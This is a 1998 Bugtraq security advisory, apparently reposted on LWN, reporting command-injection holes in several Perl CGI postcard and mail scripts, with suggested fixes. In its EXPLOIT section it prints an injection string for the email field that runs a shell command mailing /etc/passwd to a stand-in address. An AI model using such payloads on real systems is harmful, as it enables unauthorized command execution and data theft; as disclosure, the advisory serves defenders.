![[LWN Logo]](/images/lwn.banner.gif)
Date: Mon, 9 Nov 1998 18:26:05 -0600
From: xnec <xnec@WINTERMUTE.LINUX.TC>
Subject: Several new CGI vulnerabilities
To: BUGTRAQ@NETSPACE.ORG
INFO:
After looking over the perl-CGI scripts on www.cgi-resources.com,
I've discovered vulnerabilities in the following:
1. HAMcards Postcard script v1.0 Beta 2
(www.hamnetcenter.com)
2. Hot Postal Services v??
(www.hotarea.com)
note: the only metacharacter stripping this script does is rejecting
any |'s
3. RC Bowen's Postcards v??
(www.rcbowen.com)
4. LakeWeb's File Mail and Mail List (expanded File Mail) v??
(www.lakeweb.com)
EXPLOIT:
Each of these are exploitable by inputing metacharacters into the
recipient's email address. Each script calls something similar
to:
open( MAIL, "|$mailprog $email" )
# this particular line is from the LakeWeb scripts
The exploit strings are simple, something like
&mail evil@foobar.com < /etc/passwd&@host.com will work for each script
(the @host.com is necessary because some hosts check for "@" and ".")
when placed in the Recipient Email field.
As a result, any command can be executed remotely without a local
account with the uid of the webserver (usually "nobody" or similar,
but you never know).
FIX:
Either fork your sendmail process, strip out metacharacters (or only allow
certian characters), use open (MAIL , "|$sendmail -t") or rm -rf
./cgi-bin.
-xnec
######################################################
# xnec@wintermute.linux.tc - xnec on DALnet and EFnet#
######################################################